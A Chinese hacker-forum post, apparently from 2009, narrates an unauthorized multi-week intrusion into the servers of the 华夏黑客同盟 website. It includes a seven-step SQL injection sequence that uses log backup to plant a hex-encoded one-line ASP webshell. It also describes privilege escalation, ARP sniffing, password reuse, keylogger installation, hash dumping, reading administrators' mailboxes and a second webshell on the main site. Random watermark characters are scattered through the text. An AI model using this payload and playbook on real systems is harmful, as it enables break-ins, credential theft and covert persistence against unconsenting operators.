漫长渗透华夏黑客同盟之旅

admin

最近一直都很闲，就准备去黑客榜中榜找个目标练练手，看到华夏黑客同盟当仁不让的排在第一位，我就有点跃跃欲试了。据我所知：华夏黑客同盟以前和黑基并称中国黑客界的两大航母，现在依然是商业黑客网站的三巨头之一，但是安全却一直是个问题。自从上次华夏黑客同盟DNS服务器被黑以来，也有几个月了，不知道华夏现在的安全怎么样了？所以就拉上飞狼和小冰对华夏再来一次检测吧！
# ]# q9 P% F8 Y0 l) |! y* ~; ~# n" q一．        信息搜集
俗话说：知己知彼，方能百战不殆！那么首先我们就要去摸清对方的情况！ping了华夏所有网站（包括分站在内）根据返回的信息发现：华夏由于本身也是做IDC的，所以经济实力也是蛮强的，主站，论坛以及其他几个分站分别分布在几个段的几台服务器上，而且事后了解远远超出了我之前的想象，我以为和华夏网站有关系的服务器最多也就是5台左右，后来发现有联系的服务器远远不止这个数！况且有的机器还是多网卡，错中复杂，根本一时难以判断，大大增加了困难，当然这是后话！
  当把信息搜集之后，开始确定一套思路，进而能够成功攻破华夏的防线。大家都知道这类网站，从主站下手很难，旁注是不可能的，人家是独立服务器，况且很多分站都是独立服务器！所以只能嗅探了，但是即使是嗅探也不能盲目的去嗅探，他们的主站之类的肯定是有针对措施进行防护的，所以我们只能改变方略：从不起眼的分站服务器的C段下手，得到服务器之后，从服务器上面搜集信息，从而迂回渗透主站！

二．        行动开始
  X3 X$ b9 u% Q5 q: s) }既然有了思路，那么我们就开始去吧！我首先根据前面的信息的刺探，来挑选第一战的目标！即华夏的几个分站所在的两台服务器（简称目标A和C）和IDC所在的服务器（简称目标B）！经过hscan的扫描发现，目标A和C所在的C段，很多都用的是serv-U，于是有很大的希望拿下一台来。经过一会的寻找，找到一个网站的DB点，可是郁闷的是差异备份之后，老是显示500，连接也连接不上，用NBSI来备份也不行，无奈之下只能手工logo备份了
=======================================================================================================================================================
1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)       XXX为数据库名
. X8 C8 L. n6 @7 q
+ o/ y' ?, u/ S& G, A# V2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init-- (减少备分数据的大小)
9 V- S# Y4 a' N
8 L+ X( B# H" ?1 ]4.InjectionURL';insert into cmd(a) values (0x3C25657865637574652872657175657374282261222929253E)-- (插入一句话木马)

5.InjectionURL';backup log XXX to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径）

) {" ?% P: y) N% o8 f5 w7 |6.InjectionURL';drop table cmd-- （删除新建的cmd表）

4 ?# R1 r7 ^. z) y+ z7.InjectionURL';alter database XXX set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)
=========================================================================================================================================================
) y) D5 f) f+ Z6 Z于是得到了一个一句话的shell！如图1
3 [6 k& A; N8 N/ N3 l6 ahttp://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/09101421541c46c2bcf42a95a6.jpg链接标记下载 (78.07 KB)

8 l: I! q' U* m+ s( p2009-10-14 21:54
: ]  A( ^$ O$ Q于是赶紧连接上传个大马上去，经过一会的信息查看发现WS组件被删除，那么就不能执行命令了，而且这台服务器不是用的Serv-U，这无异大大增加了提权的难度，翻了半天也米有找到什么东西，这个服务器上面就一个站，只找到一个mssql账号和密码。当我准备备份到启动项的时候，发现小冰说能进服务器了，？？我汗，这么快就能提权了？？？？他说在某个目录下的web..config里面竟然找到了administrator和明文密码，汗，当时我翻了却米有找到。这下连hash都省的抓了，于是顺利进入服务器！如图2
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/09101421542727d717da8be484.jpg链接标记下载 (60.72 KB)

4 k5 E. ~" d+ [4 [) }$ V& ^( n4 ^2009-10-14 21:54
0 W5 N2 h% }$ N" J# k/ w进入服务器之后发现米有防ARP软件，估计其他服务器差不多也如此，我准备搞起cain嗅探的时候，他说先别，你米有发现点问题么？仔细看了下我也注意到了，发现密码竟然是以huaxia77169加上其他字母符号，最后我们确定这台服务器估计是华夏的人管理的，于是我们用这个密码社工和华夏有关的服务器，最后竟然发现成功社工下一台目标B的C段一台服务器！更可怕的是这台竟然是华夏的DNS服务器！如图3 和如图4
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154c488ffc4f88d451a.jpg链接标记下载 (29.88 KB)

2009-10-14 21:54http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154858a0f5e631a72e4.jpg链接标记下载 (96.63 KB)

/ a; A4 Z- o: L& i, Y; X3 X2009-10-14 21:54
进去之后，看到网站那个地方有77169，但是发现不是华夏的网站，只是一个测试用的网站而已，上面只绑定了一个vip的下载站而已。此时，我们就能做点什么了，那就是是从DNS服务器上面下手，总觉得有点投机取巧，也达不到渗透学习的目的！
% u2 z- S, r% i5 `" L我们在桌面上，发现了保存华夏的几台服务器的终端密码以及终端端口的txt文本，试了之后发现郁闷的是连接不上，过了一会一看日期，竟然是08年11月的，汗，早都过时了！那么我们推断这台服务器以前是管理员的常用服务器，管理员经常通过它来连接其他华夏的服务器或者是FTP，所以桌面上面才会有保存密码的txt，那么我们大胆推断华夏肯定有一台服务器也是如此，因为这台服务器的这个功能废弃了，肯定转移到其他服务器上面了，于是取代了dns服务器的这个功能和作用，所以只要我们拿到了那台服务器，华夏的服务器估计都能沦陷了，可是问题来了，我们怎么知道是哪台呢？哎，还是老老实实一步一个脚印的走吧！

0 F* G% f! [( ]& H( ]三．        扩大战果
此时，我们已经完成了渗透思路的第一步，分别搞到了目标A和B同网段的两台机器机器，那么接下来就是继续了！打开cain经过测试后发现，能够成功嗅探信息，于是我们开始了嗅探！
第二天晚上刚上线，飞狼就告诉我成功搞定了目标C（如图5）和其他一台服务器（也是留作嗅探A的备用），但是目标A还是米有嗅探到有用数据，有一点失望，因为目标A和B还有DNS服务器这三台机器是能否渗透华夏所有服务器的关键！
* q5 r+ ]7 B; q: b( uhttp://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154608e6e3a66d6ba45.jpg链接标记下载 (51.26 KB)
- r: O$ l' O8 Z9 f! L0 `2 t- A
/ W% D, n# B) m- n" E; J" ]$ X2009-10-14 21:54
9 z+ M6 Q4 m6 f0 u8 c! b事后我们发现这台服务器是多网卡的，怪不得我记得某个分站的ip不是这个，没有想到的是我们拿到的目标C竟然是几个虚拟机的主系统，服务器上面有华夏的几个分站。如图6
6 O2 D- Y. L$ h8 O% Q$ D  J* Dhttp://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/09101421548059fb65911a2e77.jpg链接标记下载 (30.77 KB)
/ W5 O$ }1 w3 y. ?' Y0 g
. t: g7 ~# X; @1 M8 T4 B0 Z2009-10-14 21:54
话说目标A和C这边有了突破，B那边也有了进展，也拿下了一台服务器，虽然不是IDC的，可能有人问为什么不去直接嗅探目标呢！不想用dns服务器去嗅探主要是因为：一。因为dns服务器上面经常有管理在线的，容易被发现。二。因为DNS服务器的重要性，不想丢失！用DNS服务器去嗅探是实属无奈，根本米有那个段的其他机器去嗅探。
: ^2 L( p7 j3 Ohttp://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154e7561c1726ec0874.jpg链接标记下载 (67.68 KB)
* Z; x* W! ~/ e. l8 w$ Y) `) Q5 q" Y
2009-10-14 21:54
因为对方管理员不等同于一般网站的管理员，所以为了保险起见，我们全部抓取hash，并且安装上键盘记录器，以防丢失权限！
* ]7 \# _& Q+ ~! ]1 Y  ?& ]2 d6 |PS：从这几个服务器上面找到了serv-u的配置信息，但是密码都是破解不了的，所以不能帮上忙！
8 u2 n2 C2 J; s) }+ q3 E

9 p: H9 e7 Q5 d) F, s* N四．        遭遇挫折

( H9 U, g: C+ T5 }# J+ B+ D! ?也许是前面进行的太顺利了，所以一场沉痛的打击不可避免的来临了。当我们在服务器上面操作的时候，直接被T了，于是感觉不妙，果然除了最开始拿下的那台服务器之外，所有的服务器都登陆不上去了，（第一台之所以没有丢失，是因为web.config里面保存着管理明文密码，随管理员改动而改动）。好在目标C和DNS服务器还在，但是IDC那个段和目标A和C那个段的留作备用的，却不行了！
$ k0 }9 T/ v7 m& V6 ~- p于是我又去找了目标B同段的一台服务器，费了我一些时间，通过SQL注射并提权得到了服务器，但竟然不是一个网关，无法进行嗅探！严重崩溃！
! l, v; w8 y0 ?% S- S; `由于之前嗅探到了几个华夏的管理的邮箱，所以我们进了他们网站的几个管理的邮箱，看看能不能找出点什么东西来突破，但是也米有发现什么重要的。如图8，9，10
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154e9c6113836375cf5.jpg链接标记下载 (103.37 KB)
+ a( _7 `, w7 z8 ^
1 P  o& j! Q7 A2009-10-14 21:54
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142154d79d0d251b905aab.jpg链接标记下载 (105.29 KB)
' _. l3 Z) D& T' B
, x. B6 M4 E: v4 {& F: D$ z; W; F2009-10-14 21:54
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/09101421546558364dee0d650a.jpg链接标记下载 (98.2 KB)

' ^7 ?# Q1 ]8 O* @2009-10-14 21:54
  T2 ^$ W, f( N3 ?3 v6 y4 O实在米有办法的时候，我把华夏所有的密码全部弄到一起，做了一个字典，针对ftp和mssql以及终端测试了一遍，仍然无功而返
# o& j" L5 z& J2 h于是晚上，飞狼，小冰我们商量了一下，只能等过段时间再搞了，“渗透是需要大量的时间和精力”这句话一点不假！
0 A' L0 O" e  _7 E
0 O) R1 S5 S) Y五．        卷土重来
大约过了一个星期，我一天无意在看他们网站的时候，发现VIP站竟然改变了IP，发现竟然就是我们拿下的DNS服务器，也就是说他们因为前一星期我们在搞所以挪服务器了，但是搞笑的是竟然直接送上门来了！原来VIP站是独立的服务器，这下节省了我们大量时间！如图11
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/09101421552fa8877e084e249a.jpg链接标记下载 (55.63 KB)

2009-10-14 21:55
: E4 u& M7 Q2 K5 w6 t
9 h+ E) [2 V2 }: H: z# X于是我赶紧告诉飞狼开工！我进入服务器之后就发现，原来服务器里面的盘有了改变，以前只有三个盘，现在却有5个盘，看样子估计是VIP所在的是移动硬盘，直接挪过来了。那么我们赶紧去那两个盘找信息，里面果然有好多东西，我竟然找到了目标B的mssql账号和密码，但是不允许外连，郁闷了！我就不相信就这么些信息，对了，前短时间，飞狼不是说嗅探到了后台账号和密码了么？但是米有验证码，那么VIP站也是用的动易，他们的验证码会不会是一样的呢？翻了半天找到之后发给飞狼，飞狼试了之后说不行！
* A: a+ H: [  V+ m* s1 E( V我们又讨论的时候，飞狼说搞定了77169.org（最后断定这台服务器是用的也是多网卡）的shell ，我狂汗啊！他说是同步专家弄上去的，他说目标C服务器上面找到的，之前由于忙于其他的，就米有对我们说，汗！由于我之前是专门找账号和密码之类的信息的，所以根本就米有去C盘找，怪不得呢！我去目标C服务器看了下果然！但是只能同步到目标A服务器，不能同步到主站和论坛！
# `* p6 w* Q4 R' P$ {8 b但是我却打不开，飞狼说需要修改hosts文件的内容或者是用IP代替域名，不然打不开！如图12和13
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/091014215503e2b563cf63bb81.jpg链接标记下载 (57.84 KB)
9 w0 u, {0 M) B" x' ]' o' S) T
6 v& u/ h. `1 v' c2009-10-14 21:55
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142155e2097ae2db186379.jpg链接标记下载 (107.49 KB)

( F9 |* u3 ~! }$ T/ D* U2009-10-14 21:55
拿到shell之后，发现权限还可以，盘符基本都可以浏览！由于这台服务器用的是serv-u，知道米有希望，还是试着提了一下，无果。本想找serv_U的目录，翻了半天米有找到，后来一想：当初上其他几个服务器的时候，这些重要的软件程序都是放在管理员的桌面上的，米有权限也就不能访问查看了。
扫终端的时候发现开了7161端口，那个不是syn的端口么？看来目标A上面也有syn同步专家，所以去访问了下C:\Program Files\syn目录，郁闷的是C:\Program Files能访问，syn目录却做了设置不能访问，由于不支持aspx，所以暂时也米有办法！但是此时Program Files目录下的一个文件夹，直觉告诉我：他和同步专家有联系（由于文件名和syn有关系好像是什么dbsyn），但是找了几次米有找到什么有价值的东西，都只是一些记录文件之类的！
这时候我们商量了下如何继续的时候做出了推测：由于服务器上面有太多黑客工具和软件，所以服务器上面米有杀毒软件，这对我们有很大的利用价值，这样我们就可以备份启动项了，而不用去关心远控免杀不免杀的问题了！于是商量之后飞狼他们便去备份启动项去了（参照bloodsword在T00LS发的一种不错的方法）！我此时又去了翻了翻那个文件夹，果然在那个目录下的某个连接记录的文件里面找到了主站的mssql账号和密码，直接去连接是连接不上去的，也是不允许外连。飞狼让我在shell里面试着连接一下，哈哈，竟然能连接上！如图14
$ c' n! n& ^2 `记得我们手里还有一个目标B的mssql账号和密码，也试着连接了一下，发现还是不行！
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/091014215501eeb84535014d53.jpg链接标记下载 (113.42 KB)

2009-10-14 21:55
六．攻陷主站
2 j+ H6 M. e/ l1 ]3 O
主站能连接上的话，就好办多了，我们直接在这个shell里面通过主站的mssql账号和密码，来构造一个注射点，然后找出网站路径去备份到主站一个一句话shell。
构造好之后，使用啊D列出来了路径，然后就是备份了（参照开始的logo备份）备份进去后得到了一句话（如图15）
2 d* i" x7 J1 x5 ~http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/091014215538bb571e4202f70c.jpg链接标记下载 (86.55 KB)
& Z0 m* O$ d7 \: ^7 n
0 w1 K6 R1 n: b- l2 G2009-10-14 21:55
列目录的时候，我和飞狼有分工，飞狼去找路径，我去找有用的信息，当时我在里面看到了flashfxp，于是通过一句话直接把三个dat文件给下载了下来。如图16
http://www.t00ls.net/images/default/attachimg.gif  http://www.t00ls.net/attachments/month_0910/0910142155d1018d0ba7e8ea02.jpg链接标记下载 (54.58 KB)
* B; U; T% J6 ]3 @' p
2009-10-14 21:55
我本地打开flashfxp后，我惊了，竟然有华夏的很多服务器上面分站的ftp，但是发现高兴的太早，都不能连接不能用，过期了，无语！这时候只能从shell里面翻东西看看有米有办法了！就在我们往上面写大马的时候，发现出事了，竟然写不进去，我以为是马的问题，换了一个小马还是写不进去，换其他目录也不行，飞狼这时候也说了：他也试了，都写不进去！最后我们讨论之后得出的结论是：做了虚拟目录映射或者是主战的更新什么的都是通过同步专家来搞定的，但是郁闷的是目标A和主站服务器上面的同步专家目录文件都不能去访问！这下玩大了，如果不能尽快拿下主站的权限，备份的一句话被发现是肯定的。更郁闷的是无巧不成书，第二天不知道哪个傻逼，竟然偏偏这个时候发出来了个华夏被黑的帖子，我们当时就看了那个txt，当时我们还以为是还有其他人也来了，但是一看日期竟然是07年的，所以肯定不是最近有人来过了！这下不好收场了，估计华夏的人看到后，去服务器清理这个页面的时候，发现了我们的杰作！又一次被发现了，77169.org和主站的权限全部丢失！
    后记：其实想拿回来也不是件难事，因为手里掌握着大量的信息，关键是因为马上就要放暑假了，我们都要忙于自己的事情，也就很少有时间去关心这个了。另外由于写作水平以及过程中的复杂性，许多东西都省略了，只是想尽量简单和清楚的呈现给大家！有什么不明白的地方，请去黑客手册官方论坛提问！
体会：本次过程都是运用的基础知识，根据此次渗透，大大的加深了自己的知识点，但是还是发现自身有缺陷的地方，在实战中找到自己的不足，并学习弥补这才是玩脚本渗透的唯一目的。
另外其实渗透也就是一场攻与防的游戏，对于双方来说：在这个过程中你需要做的就是将你所学会的东西灵活的运用起来，不同的是双方的立场以及目的相对立罢了！
最后对于华夏以及其他的管理员，只想说：        
0 N6 ]! R; g- E: N在攻与防的对立上，莫要做纸老虎，一捅即破！